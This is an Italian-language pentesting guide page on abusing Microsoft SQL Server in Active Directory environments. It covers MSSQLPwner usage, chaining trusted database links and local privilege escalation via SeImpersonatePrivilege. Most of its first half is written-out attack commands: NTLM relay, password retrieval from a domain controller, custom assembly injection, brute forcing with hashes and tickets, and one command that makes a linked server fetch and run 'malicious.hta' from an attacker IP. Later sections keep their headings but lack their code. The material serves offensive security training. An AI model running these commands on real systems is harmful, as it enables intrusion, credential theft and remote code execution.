MSSQL AD Abuse
MSSQL AD Abuse
MSSQL Enumeration / Discovery
Python
Lo strumento MSSQLPwner è basato su impacket e consente anche di autenticarsi utilizzando ticket kerberos e attaccare attraverso catene di collegamenti.
```shell # Interactive mode mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
Interactive mode with 2 depth level of impersonations
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -max-impersonation-depth 2 interactive
Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname
Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname
Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname
Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250
Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
Executing direct query
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER"
Retrieving password from the linked server DC01
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrive-password
Execute code using custom assembly on the linked server DC01
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll
Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
Interactive mode
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
Enumerare dalla rete senza sessione di dominio
Enumerare dall'interno del dominio
MSSQL Abuso di Base
Accesso al DB
MSSQL RCE
Potrebbe essere anche possibile eseguire comandi all'interno dell'host MSSQL
Controlla nella pagina menzionata nella sezione seguente come farlo manualmente.
MSSQL Tecniche di Hacking di Base
1433 - Pentesting MSSQL - Microsoft SQL ServerMSSQL Link Fidati
Se un'istanza MSSQL è fidata (link del database) da un'altra istanza MSSQL. Se l'utente ha privilegi sul database fidato, sarà in grado di utilizzare la relazione di fiducia per eseguire query anche nell'altra istanza. Queste fiducia possono essere concatenate e a un certo punto l'utente potrebbe essere in grado di trovare qualche database mal configurato dove può eseguire comandi.
I link tra i database funzionano anche attraverso le fiducie tra foreste.
Abuso di Powershell
Metasploit
Puoi facilmente controllare i link fidati utilizzando metasploit.
Nota che metasploit cercherà di abusare solo della funzione openquery()
in MSSQL (quindi, se non riesci a eseguire comandi con openquery()
, dovrai provare il metodo EXECUTE
manualmente per eseguire comandi, vedi di più qui sotto.)
Manuale - Openquery()
Da Linux potresti ottenere una shell della console MSSQL con sqsh e mssqlclient.py.
Da Windows potresti anche trovare i link ed eseguire comandi manualmente utilizzando un client MSSQL come HeidiSQL
Esegui il login utilizzando l'autenticazione di Windows:
Trova link affidabili
Eseguire query in un link affidabile
Eseguire query tramite il link (esempio: trova più link nella nuova istanza accessibile):
Controlla dove vengono utilizzate le virgolette doppie e singole, è importante usarle in quel modo.
Puoi continuare questa catena di link fidati per sempre manualmente.
Se non puoi eseguire azioni come exec xp_cmdshell
da openquery()
, prova con il metodo EXECUTE
.
Manual - EXECUTE
Puoi anche abusare dei collegamenti fidati utilizzando EXECUTE
:
Escalazione dei privilegi locali
L'utente locale MSSQL di solito ha un tipo speciale di privilegio chiamato SeImpersonatePrivilege
. Questo consente all'account di "impersonare un client dopo l'autenticazione".
Una strategia che molti autori hanno ideato è forzare un servizio di SISTEMA ad autenticarsi a un servizio rogue o man-in-the-middle che l'attaccante crea. Questo servizio rogue è quindi in grado di impersonare il servizio di SISTEMA mentre sta cercando di autenticarsi.
SweetPotato ha una raccolta di queste varie tecniche che possono essere eseguite tramite il comando execute-assembly
di Beacon.
Last updated